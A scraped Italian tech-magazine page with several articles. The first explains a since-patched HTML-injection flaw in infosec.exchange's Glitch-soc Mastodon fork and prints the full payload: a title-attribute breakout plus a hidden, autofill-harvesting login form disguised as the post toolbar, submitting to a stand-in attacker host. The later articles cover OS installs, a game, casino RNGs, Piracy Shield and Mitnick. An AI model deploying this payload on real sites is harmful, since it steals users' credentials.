Articoli
Una falla non Mastodon-tica
Una piccola falla nel filtro HTML di una istanza Mastodon permette l’iniezione di un form nascosto in un post, con cui rubare le credenziali degli utenti che lo visualizzano

Da quando Elon Musk ha acquistato il controllo di Twitter, e ha preso alcune decisioni molto controverse, questo social network ha visto una emorraggia di utenti, che si sono rifugiati su Mastodon. In effetti, Mastodon viene visto un po’ come una versione libera e open source a Twitter, nel senso che mantiene funzionalità simili. Se considerare Diaspora una alternativa FOSS a Facebook è improprio, perché la logica di base e le funzionalità sono differenti, si può dire che Mastodon sia davvero pensato con la stessa logica di interazioni sociali esistenti su Twitter. La sua natura open source, però, offre una serie importanti vantaggi, non ultima la possibilità di personalizzare la propria istanza. Questa “medaglia” ha, chiaramente, un rovescio: è possibile che il server che si sta utilizzando usi una versione di Mastodon differente da quella “ufficiale”, che può quindi nascondere falle e vulnerabilità sconosciute.

Un post malevolo, che riproduce la toolbar dei post di Mastodon e include il form nascosto (FONTE: https://portswigger.net)
Una federazione di server
Uno dei server Mastodon molto utilizzati da chi si occupa di informatica in generale, e di sicurezza informatica nello specifico, è infosec.exchange. Una caratteristica interessante di questo server è che offre la possibilità, nelle impostazioni utente, di abilitare i post in html. Questo significa che l’eventuale contenuto HTML di un post viene caricato nella pagina, interpretato dal browser, e visualizzato. Questo è un potenziale problema in termini di sicurezza perché implica che a un utente è permesso aggiungere componenti al DOM della pagina, e non dobbiamo dimenticare che poi sono i browser degli altri utenti a visualizzarlo, eseguendo tutto ciò che è previsto dall’HTML. Ma, chiaramente, non tutto l’HTML viene per nuocere: è un linguaggio di markup, si occupa più che altro di paragrafi, pulsanti, link e intestazioni. In linea di massima si potrebbe dire che finché si aggiungono elementi grafici sulla pagina non è un problema immediato. Il componente più pericoloso è l’elemento <script></script>, che infatti non è permesso. Il server Mastodon in questione ha infatti un filtro che elimina eventuali porzioni di Javascript inserite nei post. Tutto bene, quindi? Purtroppo no, perché Javascript non è l’unico modo per ottenere una esecuzione remota di codice direttamente nei pc degli utenti, pur essendo il più ovvio. Un metodo meno ovvio, ma spesso sufficientemente efficace, consiste nel farlo fare all’utente, nascondendo pulsanti e anche interi form in una pagina.
Il filtro per l’html, naturalmente, impedirebbe di inserire un form dentro un post Mastodon. Tuttavia, i post possono contenere degli attributi, e gli analisti hanno scoperto che il tag dedicato al titolo del post viene mantenuto così com’è. Infatti, questo codice:
<abbr title=”<img src=1 onerror=alert(1)>”>test</abbr>
Viene poi renderizzato nella pagina in questo modo, completamente intatto:
<abbr title=”<img src=1 onerror=alert(1)>”>test</abbr>
Come si può intuire, non è possibile usarlo per iniettare Javascript, ma si può usare per iniettare dell’html. Il “problema” è che il codice sarebbe all’interno del titolo, e non ha molto senso. Per poter iniettare qualcosa di realmente pericoloso, bisogna trovare un modo per uscire dal tag. Serve qualcosa che venga sostituito automaticamente, e che possa quindi sfuggire al filtro sull’html.
Per esempio, la scorciatoia
:verified:
Inserisce in un messaggio, titolo incluso, l’icona con la spunta blu tipica di un post “verificato”. Che si riduce a questo html:
<img draggable=”false” class=”emojione custom-emoji” alt=”:verified:” […] >
Facendo un tentativo, si nota che il codice apparentemente inutile
<abbr title=”<a href=’https://blah’>:verified:</a><iframe src=//garethheyes.co.uk/>”>
Diventa:
<abbr title=”<a href=’https://blah</a>’>
<img draggable=” false” … >
<iframe src=//garethheyes.co.uk/>
Quello che è successo è che il server ha inserito il tag img ma, così facendo, ha chiuso il tag precedente, rendendo quindi completamente autonomo il tag con l’iframe che altrimenti sarebbe apparso come testo. L’iframe viene quindi caricato, ed è teoricamente possibile integrare nella pagina porzioni di un altro sito web.
Non è comunque possibile integrare nella pagina altre risorse, come fogli di stile o script: i responsabili del server Mastodon hanno ovviamente previsto che qualcuno potesse cercare di integrare porzioni di pagine presenti su altri server, e hanno impedito questa cosa implementando delle Content Security Policies particolarmente stringenti. Non è infatti possibile fare riferimento a nessuna risorsa esterna al dominio infosec.exchange. Un form, però, può tranquillamente puntare a un’altro sito web. Si può quindi iniziare a scrivere un codice di questo tipo:
<abbr title=”<a href=’https://blah’>:verified:</a></abbr>
<form action=//pirata.it/rubapassword>
<input name=username >
<input type=password name=password >
Questo codice produrrebbe un classico form di login. Qual è il vantaggio, per un malintenzionato? Che i browser moderni, Google Chrome in particolare, hanno la funzione autofill attiva e riempiono automaticamente i campi, inserendo quindi nome utente e password dell’utente che sta visualizzando il post. Non avendo a disposizione javascript non si può attivare un invio automatico del form, però è possibile inserire un pulsante. Basta trovare un modo per camuffarlo e convincere l’utente stesso a cliccarci sopra. Una opzione consiste nel riprodurre la toolbar che appare sotto ad ogni post:
<div class=’status__action-bar’><button type=submit aria-label=’Reply’ title=’Reply’ class=’status__action-bar-button icon-button’ tabindex=’0′>
<i role=’img’ class=’fa fa-reply fa-fw’ aria-hidden=’true’></i>
</button>
<button type=submit aria-label=’Boost’ aria-pressed=’false’ title=’Boost’ class=’status__action-bar-button icon-button’ tabindex=’0′ ><i role=’img’ class=’fa fa-retweet fa-fw’ aria-hidden=’true’></i>
</button><button type=submit aria-label=’Favourite’ aria-pressed=’false’ title=’Favourite’ class=’status__action-bar-button star-icon icon-button’ tabindex=’0′><i role=’img’ class=’fa fa-star fa-fw’ aria-hidden=’true’></i>
</button><button type=submit aria-label=’Bookmark’ aria-pressed=’false’ title=’Bookmark’ class=’status__action-bar-button bookmark-icon icon-button’ tabindex=’0′>
<i role=’img’ class=’fa fa-bookmark fa-fw’ aria-hidden=’true’></i> </button>
<div class=’status__action-bar-dropdown’><button type=submit aria-label=’Menu’ title=’Menu’ class=’icon-button’ tabindex=’0′><i role=’img’ class=’fa fa-ellipsis-h fa-fw’ aria-hidden=’true’></i> </button></div>
</div>
“>
Nella action bar ci sono 5 pulsanti: Reply, Boost, Favourite, Bookmark, e Menu. Per riprodurli basta copiare il codice html dei veri pulsanti, tanto il loro aspetto dipende dai CSS che sono comunque già caricati nella pagina. Essendo perfettamente simile alla vera barra del post, è plausibile che più di qualche utente possa cliccarci sopra per sbaglio. L’unico passaggio che manca è nascondere i campi del form, altrimenti l’utente si rende perfettamente conto dell’inganno. Non si possono trasformare i campi in “hidden”, perché l’autofill dei browser non funzionerebbe. Però, almeno Chrome, funziona perfettamente se i campi non sono visibili a causa dello stile impostato nei CSS. La soluzione, per un malintenzionato, quindi, consiste nel cercare una classe, nei fogli di stile caricati naturalmente da Mastodon, che renda l’oggetto invisibile. Per esempio, la classe react-toggle-track-check ha l’opacità impostata a zero. Assegnando questa classe agli elementi input:
<input name=username class=react-toggle-track-check>
<input type=password name=password class=react-toggle-track-check>
Rimangono nella pagina pur essendo invisibili per l’utente, e vengono riempiti dall’autofill con i dati dell’utente. Quando l’utente clicca su uno dei pulsanti il form viene inviato al sito del malintenzionato, che quindi riceve le credenziali della vittima.

Cliccando su un pulsante il form viene inviato al server del malintenzionato, che quindi riceve in chiaro username e password della vittima (FONTE: https://portswigger.net)
Entità della vulnerabilità
Questa vulnerabilità è dovuta a una modifica presente sul server di infosec.exchange, quindi gli altri server Mastodon non sono necessariamente vulnerabili. E gli utenti di questo server sono in buona parte esperti di sicurezza, quindi è meno probabile che possano cadere nel phishing. È però anche vero che questo tipo di attacco potrebbe, teoricamente, essere applicato a altri server che contengano una modifica simile. Dipende infatti da alcune funzioni relative al supporto a markdown e html nei post presenti in Glitch-soc, un fork di Mastodon su cui si basa il server di infosec.exchange ma che altri potrebbero avere implementato sui propri server. Il problema, per un utente, è che non è facile capire se il server abbia questa vulnerabilità, e con l’improvviso aumento di utenti (e server) è facile che qualcuno finisca su un server che non è correttamente patchato.
La soluzione
I responsabili di Glitch-soc hanno corretto immediatamente il problema dopo la segnalazione, e i server di infosec.exchange sono ormai sicuri. La versione originale di Mastodon, invece, non è mai stata in pericolo, perché non supporta gli attributi title per i post. Più in generale, però, questo tipo di attacchi non potrebbe funzionare senza browser web che eseguono l’autofill su form che l’utente non riesce nemmeno a vedere. Purtroppo, non esistono estensioni per Google Chrome che disabilitino l’autocomplete temporaneamente, in modo da farlo funzionare solo quando l’utente lo desidera davvero. Su Firefox, invece, è necessario che l’utente porti almeno il focus sul form, prima che il browser cerchi di riempire i campi con le credenziali memorizzate.
Articoli
Test distro: FreeBSD 14.2
Sistema operativo che garantisce un elevatissimo livello di sicurezza, il che lo rende adatto a molteplici usi che vanno dalla creazione di server, alla gestione di reti, all’utilizzo come workstation

FreeBSD è un particolare sistema operativo di tipo UNIX, basato sulla Berkeley Software Distribution, da cui appunto BSD. Stabile e affidabile, garantisce un elevatissimo livello di sicurezza, il che lo rende adatto a molteplici usi che vanno dalla creazione di server, alla gestione di reti, all’utilizzo come workstation. Il progetto è gestito da una comunità di sviluppatori a livello mondiale che opera su base volontaria. Tuttavia, c’è un gruppo di nove persone che formano il cosiddetto Core Team e alle quali è affidato il compito di dirigere l’intero progetto, prendendo le decisioni definitive su quale codice possa essere integrato nel sistema operativo che verrà distribuito.
Migrazione e rilasci
Gli utenti già abituati a usare un sistema operativo basato su UNIX non avranno alcun problema ad adottare FreeBSD, invece chi proviene dall’esperienza Windows dovrà dedicare un po’ di tempo ad adattarsi a questo nuovo ambiente, studiando la documentazione disponibile in Rete, piuttosto ricca e molto utile. Tra queste due realtà opposte ci sono gli utenti abituati a sistemi operativi basati su Linux. Va precisato che FreeBSD non è sviluppato attorno a questo kernel, tuttavia al suo interno è implementato un codice chiamato linuxulator che rende compatibili le applicazioni Linux con questo sistema operativo. Per quanto riguarda invece i rilasci delle nuove versioni, gli utenti Linux si sentiranno molto più a casa. Infatti, il team di sviluppo pubblica una versione minore ogni otto mesi circa, mentre per quelle maggiori sono necessari più o meno diciotto mesi. Il che significa che questo sistema operativo è sempre in continua e rapida evoluzione, principalmente allo scopo di tenere il passo con l’hardware e i driver più aggiornati. Come noterete subito dopo avere terminato tutti i passi descritti nella guida che trovate in basso, FreeBSD è un sistema operativo con interfaccia a riga di comando, proprio come se si trattasse di un classico terminale Linux. Di base, questa sua caratteristica lo rende più adatto a un’utenza già esperta con questo tipo di metodo di lavoro. Per i neofiti è invece una buona occasione per imparare un modo di operare che, una volta che ci si è abituati, può dare parecchie soddisfazioni, poiché fornisce un controllo del sistema operativo molto più completo rispetto a una classica interfaccia grafica. Tuttavia è comprensibile che molti trovino più comodo lavorare con quest’ultima. Sarà, in questo caso, necessario installarne una. Clicca qui per il download.
L’interfaccia grafica
Due sono i sistemi grafici disponibili per reeBSD, vale a dire XOrg e Wayland. In entrambi i casi, il primo comando che dovrete usare per avviare la procedura di installazione è su [nomeutente] per attivare i diritti di superutente. Poi dovrete eseguire pw groupmod video -m [nomeutente]. Dopodiché dovrete digitare pkg install xorg e premere
INVIO. Diversamente, per Wayland il comando è pkg install wayland seatd.
INSTALLAZIONE PASSO A PASSO DELLA DISTRIBUZIONE
Avvio della procedura
Nella schermata iniziale, premete il tasto 1 e in quella successiva premete INVIO lasciando selezionata l’opzione Install. Quindi scorrete l’elenco delle tastiere disponibili e scegliete Italian. Premete INVIO per confermare, poi spostatevi con la freccia su Continue with it.kbd keymap e premete INVIO ancora una volta.
Partizionamento e installazione
Digitate l’hostname e premete INVIO. Nella schermata successiva, lasciate selezionate le opzioni già presenti e confermatele con INVIO. In Partitioning, lasciate selezionata la prima opzione e premete INVIO per conferma. Aspettate che la procedura effettui il test necessario e avviate l’installazione con INVIO.
Scelta del disco rigido
In ZFS Configuration lasciate selezionata la prima opzione e premete INVIO. Quindi scegliete il disco rigido in cui installare FreeBSD, premete la barra spaziatrice per fare apparire un asterisco accanto a esso e confermate con INVIO. Con le frecce, selezionate YES per confermare la scelta del disco rigido e premete INVIO.
Password e rete
Digitate la password per accedere al sistema operativo, premete INVIO e ripetete l’operazione. In entrambi i casi la vostra password non appare sullo schermo. In Network Configuration, selezionate l’interfaccia corretta e premete INVIO. Poi decidete se configurare l’IPv e procedete con INVIO.
Località e fuso orario
Con le frecce spostatevi su 7 Europe, per selezionare il fuso orario, e confermate con INVIO. Nella schermata Countries in Europe, selezionate Italy, premete INVIO e di nuovo INVIO per confermare il fuso orario (CET). Se la data che appare è esatta, lasciate selezionato Skip e premete INVIO.
Ultimi passi
Per regolare l’orologio, selezionate Set Time e premete INVIO per due volte. Saltate, per ora, la procedura di aggiunta di nuovi account, selezionando No e premendo INVIO. Lasciate selezionato Exit e premete INVIO per uscire dalla procedura di installazione. Poi selezionate No e Reboot per terminare.
Leggi anche: “Vojager 24.10: una distro live“
Articoli
Test videogiochi: Pocket Cars
Corse sfrenate con macchinine telecomandate armate fino ai denti!

Pocket Cars è un divertente gioco arcade che combina corse e combattimenti con auto radiocomandate che gareggiano su tracciati pieni di ostacoli ispirati alla realtà. Le auto sono progettate per affrontare terreni difficili grazie alle loro capacità off-road e alla possibilità di utilizzare un boost per raggiungere velocità elevate. L’obiettivo è non solo correre e completare il tracciato, ma anche gestire le risorse a disposizione e sfruttare le armi per superare gli avversari o metterli fuori gioco. Per giocatore singolo ci sono oltre 180 sfide diverse da completare, mentre per chi preferisce il multiplayer sono disponibili sia una modalità locale con schermo condiviso fino a quattro giocatori, sia una online per un massimo di otto partecipanti. Il gioco include 16 veicoli diversi, ognuno simulato con un modello fisico che tiene conto di peso, velocità e comportamento dinamico (personalizzabili per estetica e prestazioni), e 16 armi.
SPECIFICHE MINIME
OS: Ubuntu16.04 64 bit
Processore: Intel i5-2300 / AMD FX-4300
Memoria: 4 GB di RAM
Scheda video: GeForce GTX 560 / Radeon R7 260
Archiviazione: 10 GB di spazio disponibile
leggi anche: “Test videogiochi: Old realm“
Articoli
Come funzionano i RNG nei giochi online

Nel mondo dei giochi online, la casualità è tutto. Dalla rotazione di una slot machine virtuale fino alle spettacolari ruote del celebre crazy time, ogni risultato deve essere percepito dall’utente come imprevedibile ma equo. Dietro questa illusione di caos perfettamente orchestrato, però, si nasconde una tecnologia affascinante: il Random Number Generator, o RNG. Ma cosa rende davvero casuale un risultato digitale? E perché è importante che anche nel gioco online esistano standard di sicurezza e trasparenza?
Cos’è un RNG e perché è fondamentale
Un Random Number Generator è un algoritmo progettato per produrre numeri pseudo-casuali, ovvero numeri che sembrano casuali, ma sono generati secondo formule matematiche precise. Nei casinò online tradizionali, questi numeri determinano l’esito di una slot, la distribuzione delle carte in un gioco di blackjack, o il risultato di un dado virtuale.
Nel caso di Crazy Time — un gioco live basato su una ruota della fortuna reale, condotta da presentatori in carne e ossa — l’RNG entra in gioco soprattutto nelle fasi bonus, dove vengono generati moltiplicatori o mini-giochi interattivi. La combinazione tra RNG e meccaniche fisiche (la ruota vera e propria) rende il tutto ancora più interessante, perché unisce elementi programmati e osservabili, aumentando la fiducia dell’utente nell’equità del gioco.
Come vengono testati gli RNG: trasparenza prima di tutto
I migliori operatori del settore, tra cui quelli che offrono Crazy Time, si affidano a enti certificatori indipendenti per testare i propri RNG. Organizzazioni come eCOGRA, iTech Labs o GLI sottopongono i generatori a milioni di simulazioni per verificare che la distribuzione dei risultati sia realmente statisticamente corretta, senza favoritismi né pattern riconoscibili.
In più, questi sistemi sono soggetti a log periodici, auditing e controlli, proprio come succede nei software destinati alla sicurezza bancaria o alla crittografia. È un processo silenzioso ma fondamentale, che protegge l’utente finale e garantisce che ogni giocata sia davvero «solo fortuna».
Il vero pericolo è fuori dal gioco certificato
È importante sottolineare che il vero rischio per chi gioca online non viene dall’algoritmo, ma da piattaforme non regolamentate. L’RNG, infatti, è uno strumento potente e sicuro solo se utilizzato in un ambiente controllato. Per questo è sempre consigliabile affidarsi a operatori con licenza — quelli che offrono titoli famosi e ben strutturati come Crazy Time — piuttosto che cercare scorciatoie su siti poco affidabili.
Anche per chi è appassionato di hacking e reverse engineering, smontare un RNG certificato non è solo improbabile, ma anche inutile: la vera sfida è capire come questi sistemi riescano a mantenere l’equilibrio perfetto tra casualità apparente, equità matematica e divertimento costante.
Un equilibrio matematico che diverte
Crazy Time e altri game show digitali non sono solo giochi spettacolari e coinvolgenti: sono anche il risultato di un’attenta progettazione tecnologica che mette al centro l’utente. Grazie a RNG testati e certificati, ogni giocata può essere vissuta con leggerezza, senza il timore che dietro ci sia qualcosa di losco. La vera “magia” sta nel codice, ed è proprio quando il caso è ben progettato che il divertimento diventa affidabile.
Articoli
Uno scudo che fa acqua
Un ennesimo errore, che questa volta ha visto un legale sito di notizie bloccato per una partita, evidenzia i limiti di uno strumento inadeguato

La cronaca recente ha messo in evidenza un incidente significativo riguardante lo scudo anti-pirateria italiano, noto come Piracy Shield, quando il sito di tecnologia DDay è stato erroneamente bloccato. Questo evento non solo solleva domande sulla funzionalità del sistema ma riapre anche un dibattito (in realtà mai chiuso) sui suoi limiti, i suoi scopi e sulla sua efficacia.
Innovativo o inadeguato?
Il Piracy Shield è stato promosso come una risposta innovativa alla pirateria online, in particolare per proteggere le trasmissioni di eventi sportivi, come le partite di calcio della Serie A. Sviluppato e gestito dall’Autorità per le Garanzie nelle Comunicazioni (AGCOM), il sistema permette ai detentori dei diritti di segnalare contenuti pirata, che poi vengono bloccati entro 30 minuti dall’avvio della segnalazione.
Neanche Google è al sicuro
Tuttavia, il blocco di DDay ha messo in luce un problema critico: l’overblocking. Il sito, del tutto legittimo, è stato reso
inaccessibile perché ha usato lo stesso indirizzo IP di siti pirata, per una banale questione di load balancing del CDN
(leggi paragrafo in basso “Load balancing: un meccaniscmo omnipresente“). Questo errore evidenzia una grave lacuna nel sistema, che non riesce a distinguere accuratamente tra contenuti legali e illegali. Non si tratta, purtroppo, del primo errore. Il 19 ottobre 2024, per esempio, il dominio drive.usercontent.google.com, utilizzato per scaricare file da Google Drive, è stato erroneamente bloccato a livello DNS. Questo dominio è essenziale per il funzionamento del servizio di archiviazione e condivisione file di Google. L’errore specifico in questo caso è stato causato da una segnalazione errata che ha incluso un dominio di Google Drive nella lista dei siti da bloccare. Il disguido potrebbe essere avvenuto perché qualcuno ha condiviso link pirata su Google Drive, e il sistema ha automaticamente bloccato l’intero dominio associato senza verificare accuratamente la natura del contenuto. Il blocco ha causato problemi di accesso per diverse ore, influenzando migliaia di utenti, inclusi privati, aziende, scuole e università. Anche altri servizi del colosso, come YouTube, hanno riscontrato problemi temporanei correlati a questo incidente.
Tanti problemi sin dall’inizio
Il Piracy Shield, nato, come dicevamo, con l’intento di contrastare lo streaming illegale di eventi sportivi e contenuti protetti da copyright, è stato introdotto con la legge 93 del 14 luglio 2023. Già dal primo mese di operatività, si sono
verificati casi di overblocking a spese di siti legali. Nel febbraio 2024, poco dopo l’attivazione completa del sistema, un indirizzo IP di Cloudflare, che ospita milioni di siti, è stato bloccato, causando l’inaccessibilità di molti siti legittimi. Diversi esperti e associazioni di tecnologia hanno criticato il sistema per la sua progettazione amatoriale e la mancanza di considerazione per come funziona Internet oggi (load balancing incluso), oltre che per una mancanza
di trasparenza riguardo a chi esegue le segnalazioni, per la loro gestione e per i costi elevati. Il suo codice
sorgente e la documentazione interna sono stati persino pubblicati su GitHub in un leak di protesta che accusava il sistema di essere una forma di censura. Nonostante sia stato emesso un avviso DMCA per rimuovere il materiale, il codice è già in circolazione su piattaforme come Telegram e reti peer-to-peer, creando ovvi problemi per AGCOM.

L’incidente con DDAY sembra evidenziare la scarsa considerazione del sistema per come funziona Internet oggi, con indirizzi IP dinamici e CDN (Content Delivery Network) che distribuiscono contenuti attraverso numerosi indirizzi IP. Chi protegge i siti onesti?
Ancora più limiti: ne vale la pena?
Le modifiche del 2024, approvate tramite il decreto legge Omnibus lo scorso ottobre, hanno portato ad altre critiche. L’obbligo di blocco non si limita più agli ISP italiani ma si estende anche ai fornitori di servizi VPN e di DNS pubblici globali. Questa estensione ha sollevato preoccupazioni per la privacy e la libertà di Internet, poiché impone a operatori internazionali di conformarsi alle leggi italiane. Ora, inoltre, non è più necessario che un sito sia “univocamente destinato ad attività illecite” per essere bloccato, ma basta che le attività illecite siano “prevalenti”, una distinzione che potrebbe portare a un aumento dei casi di overblocking. Le modifiche hanno ampliato i
poteri di AGCOM e imposto nuovi obblighi ai fornitori di servizi, come la segnalazione tempestiva di attività sospette alle autorità competenti. Questo ha aumentato la complessità operativa per gli ISP e altri operatori di rete. Le nuove misure hanno quindi intensificato il dibattito sul bilanciamento tra la protezione del diritto d’autore e la libertà online. Ci sono preoccupazioni che tali regolamenti possano portare a una forma di censura, influenzando
negativamente l’accesso a contenuti e servizi legittimi. Le modifiche hanno, infine, incrementato i costi operativi per gli ISP e altri operatori e molti mettono in discussione l’efficacia reale di queste misure nel ridurre la pirateria, considerando che i siti pirata possono facilmente cambiare indirizzi IP o utilizzare tecnologie per aggirare le restrizioni.
LOAD BALANCING: UN MECCANISMO ONNIPRESENTE
I provider di Content Delivery Network (CDN) utilizzano il load balancing per migliorare l’efficienza, l’affidabilità e le prestazioni nella distribuzione dei contenuti agli utenti finali. Una CDN opera distribuendo copie di contenuti statici (come immagini, video, file CSS/JavaScript e pagine HTML) su una rete globale di server posizionati strategicamente
in diverse località. Il load balancing è una parte fondamentale di questo sistema, poiché consente di gestire il
flusso di richieste degli utenti in modo intelligente. Quando accedete a un sito che utilizza una CDN, infatti, determina quale server nella rete è più adatto a rispondere alla vostra richiesta. Questo viene fatto considerando
vari fattori, come la vostra posizione geografica, la latenza di rete, il carico attuale sui server e persino eventuali
guasti. Per esempio, se un utente europeo visita un sito ospitato su una CDN, il sistema di bilanciamento del carico lo reindirizzerà al server più vicino in Europa, riducendo la latenza e migliorando la velocità di caricamento. I provider CDN utilizzano il load balancing anche per garantire una distribuzione uniforme del traffico. Durante eventi ad alto accesso, come il lancio di un prodotto o un grande evento mediatico, il sistema distribuisce le richieste tra i vari server per evitare che uno solo di essi venga sovraccaricato, garantendo così che il servizio rimanga stabile. Inoltre, se un server in una specifica area geografica non è disponibile, il load balancing ridirige automaticamente le richieste verso un altro nodo funzionante, mantenendo l’alta disponibilità del servizio. In sintesi, il load balancing permette ai provider CDN di offrire un’esperienza utente ottimale indipendentemente dalla posizione o dalle condizioni di traffico, assicurando velocità, affidabilità e scalabilità nella distribuzione dei contenuti. L’esperienza di DDAY sembra
suggerire che, se un segnalatore di Piracy Shield inserisce in blacklist uno degli IP del provider CDN utilizzato
da un sito innocente che vi viene indirizzato per il load balancing, questo rischia l’interruzione del proprio servizio
con i danni che ne conseguono. La lotta alla pirateria è sicuramente importante, ma tutelare chi lavora onestamente su Internet dovrebbe esserlo altrettanto…
Leggi anche: “Maxi operazione contro lo streaming online“
Articoli
Installare Elementary OS 8.0
Basata su Ubuntu 24.04 LTS e sul kernel Linux 6.8, questa nuova versione di Elementary OS punta a migliorare in modo sensibile l’esperienza utente, grazie a tutta una serie di novità che vanno da una maggiore tutela della privacy a un’interfaccia più comoda da usare

Come è ben noto, nessun sistema operativo ha di base tutte le applicazioni che potrebbero servire a uno specifico utente, quindi la possibilità di installarne di nuove è fondamentale. Per questo, Elementary OS 8.0 introduce per la prima volta Flathub come store predefinito, con il vantaggio di avere applicazioni completamente autonome per le loro necessità di funzionamento. Sul fronte della privacy, il nuovo sistema operativo permette un controllo più capillare delle applicazioni che possono accedere ai dati dell’utente, grazie ad autorizzazioni esplicite. Anche la Dock ha subito alcuni miglioramenti. Ora è infatti sempre possibile visualizzare contemporaneamente, con un solo clic, tutte le finestre aperte e passare con più facilità da un’attività all’altra. Per chi usa questo sistema operativo nei dispositivi mobili, viene introdotto il supporto per il multi-touch, rendendo così molto più comoda e fluida la
navigazione nell’interfaccia. Per quanto riguarda un aspetto più estetico, sebbene con un’influenza diretta sulla praticità d’uso, Elementary OS introduce un nuovo set di icone per il puntatore del mouse e nuovi sfondi
sfocati nelle schermate di multitasking.
Guida pratica all’uso
Elementary OS può essere annoverato tra i sistemi operativi che cercano di rendere facile la vita agli utenti, anche a quelli meno esperti, grazie a un’interfaccia pratica da usare. In alto a sinistra c’è il menu Applicazioni, all’interno del
quale troverete tutti i programmi disponibili in ordine alfabetico. Tuttavia, facendo clic sul pulsante Visualizza per categoria, potrete averli raggruppati per area tematica. Per avere il lanciatore di un’applicazione nella Dock è
sufficiente afferrarne l’icona con il mouse e trascinarla in basso. Invece, se volete togliere un launcher dalla Dock, basterà fare un clic destro su di esso e togliere la spunta a Keep in Dock. Le notifiche sui vari aggiornamenti
disponibili vengono visualizzate facendo clic sulla campanella in alto a destra quando su di essa appare un puntino rosso. Poi sarà sufficiente premere sul pulsante dell’aggiornamento da installare per dare il via alla procedura. In Impostazioni di sistema troverete la sezione Sicurezza e privacy. Qui potrete modificare diversi parametri.
Per esempio, in Cronologia è possibile disattivare con un clic i dati di utilizzo per tutte le applicazioni contemporaneamente. Oppure potete selezionare le applicazioni che non dovranno conservarli. In Manutenzione potrete invece decidere quanto a lungo debbano venire conservati i vecchi file, per esempio quelli nel Cestino. Dopodiché, il sistema operativo li eliminerà automaticamente.
COME INSTALLARE ELEMENTARY OS
Localizzazione e tastiera
Avviato il file ISO, la prima finestra che viene proposta è quella in cui scegliere la nostra lingua. Scorrete l’elenco e selezionate Italiano, dopodiché fate clic su Select. Nella schermata seguente, scegliete la tastiera Italiana scorrendo l’elenco e poi lasciate selezionato Predefinito. Premete su Seleziona per proseguire.
Scelta del tipo di installazione
Nella schermata Prova o installa, selezionate con un clic Erase Disk and Install. Poi premete sul pulsante Erase Disk and Install, in basso. Se state usando una macchina virtuale, apparirà un messaggio che vi avverte che il sistema operativo potrebbe subire rallentamenti o altro. Fate clic su Install Anyway.
Disco rigido e cifratura
In Seleziona un supporto vengono elencati i dischi rigidi disponibili per l’installazione. Selezionate quello che volete
dedicare a Elementary OS e fate clic su Successivo. In Enable Drive Encryption, premete su Don’t Encrypt, a meno che non abbiate motivi di sicurezza per fare diversamente.
Driver aggiuntivi e installazione
Nella schermata Additional Drivers, selezionate con un clic Include third-party proprietary drivers… e premete sul pulsante Cancella e installa. A questo punto ha inizio l’installazione vera e propria di Elementary OS, al termine della quale dovrete fare clic su Riavvia il dispositivo. Rimuovete il file ISO e premete INVIO.
Il benvenuto
Nella finestra Welcome, fate clic su Successivo. Poi selezionate l’aspetto dell’interfaccia, per esempio Scuro. Premete su Successivo e decidete se attivare la Luce Notturna. Poi selezionate il tipo di Manutenzione, per esempio con la
cancellazione automatica dei file temporanei.
Ultimi dettagli
Nella schermata successiva potrete attivare fin da subito gli Online Accounts. Quindi, in Ottieni delle applicazioni, potrete già installare quelle che vi servono. In Automatic Updates, selezionate Operating System dopodiché, fatto clic su Per iniziare, potrete finalmente usare Elementary OS.
Leggi anche: “Vojager 24.10: una distro live“
Articoli
L’uomo che riuscì a fermare il Condor!
Nel mondo hacker, dove i confini tra giusto e sbagliato si sfumano, Kevin Mitnick rimane una delle figure più amate e controverse. Dietro la sua cattura, però, ci fu un altro uomo che…

Nel mondo hacker, la linea tra “eroi” e “antieroi” è sottile, ed è comune che figure considerate generalmente come “i buoni” si rivelino meno perfette di quanto appaiano. Ciò che è certo, è che si tratta di figure non convenzionali. Anzi, uniche. È il caso di Tsutomu Shimomura, un esperto di sicurezza informatica giapponese diventato noto perché contribuì a incastrare Kevin Mitnick, uno dei più celebri hacker della storia, conosciuto come “il Condor”. Forse il primo in assoluto, di cui abbiamo più volte parlato sulle colonne di questa rivista. Ma chi è questo enigmatico uomo e come riuscì a compiere una tale impresa?
IL PRINCIPIO
Tsutomu Shimomura non è un hacker nel senso classico del termine. Non proveiene da una cultura di sovversione digitale né condivide l’etica del “libero accesso” che spesso guida il mondo dell’hacking. È uno scienziato, un esperto in crittografia e sicurezza informatica che lavora per difendere i sistemi dagli attacchi. In passato, il suo percorso si è incrociato con quello di Mitnick, quando quest’ultimo decise di infiltrarsi nei suoi sistemi.

Shimomura ha raccontato la sua “impresa” nel libro Takedown (del 1996) che fu adattato per il cinema nel film omonimo nel 2000.
UNA SFIDA
Tutto avvenne nel 1994, quando Mitnick, già ricercato dall’FBI, violò i sistemi di Shimomura e, per quest’ultimo, la caccia al Condor non fu solo una questione lavorativa, ma una vera e propria sfida.
Armato delle sue competenze e della sua passione per la sicurezza, Shimomura collaborò con l’FBI per rintracciare Mitnick. Fu una battaglia tecnologica all’avanguardia, in cui Shimomura utilizzò tecniche di tracciamento innovative per l’epoca, tra cui la triangolazione dei segnali cellulari, per localizzare l’hacker che si nascondeva dietro il suo alias.
Mitnick, che aveva passato anni eludendo le autorità, si trovò improvvisamente davanti un avversario inaspettato. Non un altro hacker, ma un uomo che combinava una profonda conoscenza tecnica con una determinazione feroce. Alla fine, nel febbraio del 1995, Kevin Mitnick fu arrestato in un appartamento a Raleigh, nel North Carolina, grazie anche all’inseguimento digitale orchestrato da Shimomura.

John Markoff è il giornalista informatico che collaborò con Shimomura alla cattura di Mitnick.
UNA BATTAGLIA TRA DUE MONDI
“L’inseguimento” tra Shimomura e Mitnick non fu solo una battaglia tecnologica, ma anche una sorta di scontro ideologico. Da una parte, c’era il Condor, simbolo della libertà hacker e della sfida alle autorità; dall’altra, Shimomura, emblema della difesa della sicurezza e del rispetto per la legge. Questo conflitto rappresenta perfettamente una delle dinamiche più affascinanti del mondo dell’hacking: la costante tensione tra chi vede nella Rete uno spazio di anarchia e libertà, e chi lo considera un terreno da proteggere e regolamentare. Entrambi i protagonisti di questa vicenda sono diventati figure di culto nei rispettivi ambiti, e la loro storia continua a essere studiata e discussa dagli appassionati di tecnologia e sicurezza informatica.

Il padre di Shimomura, Osamu Shimomura, vinse il premio Nobel per la chimica nel 2008.
Leggi anche: “Addio a Kevin Mitnick“
Articoli
I gadget segreti degli hacker
La valigetta del pirata contiene dispositivi hi-tech piccoli, anonimi e potenti, facilmente acquistabili anche su Amazon. Ecco la nostra selezione di questo mese

SEESII NANOVNA-H
ANALISI DI RETE
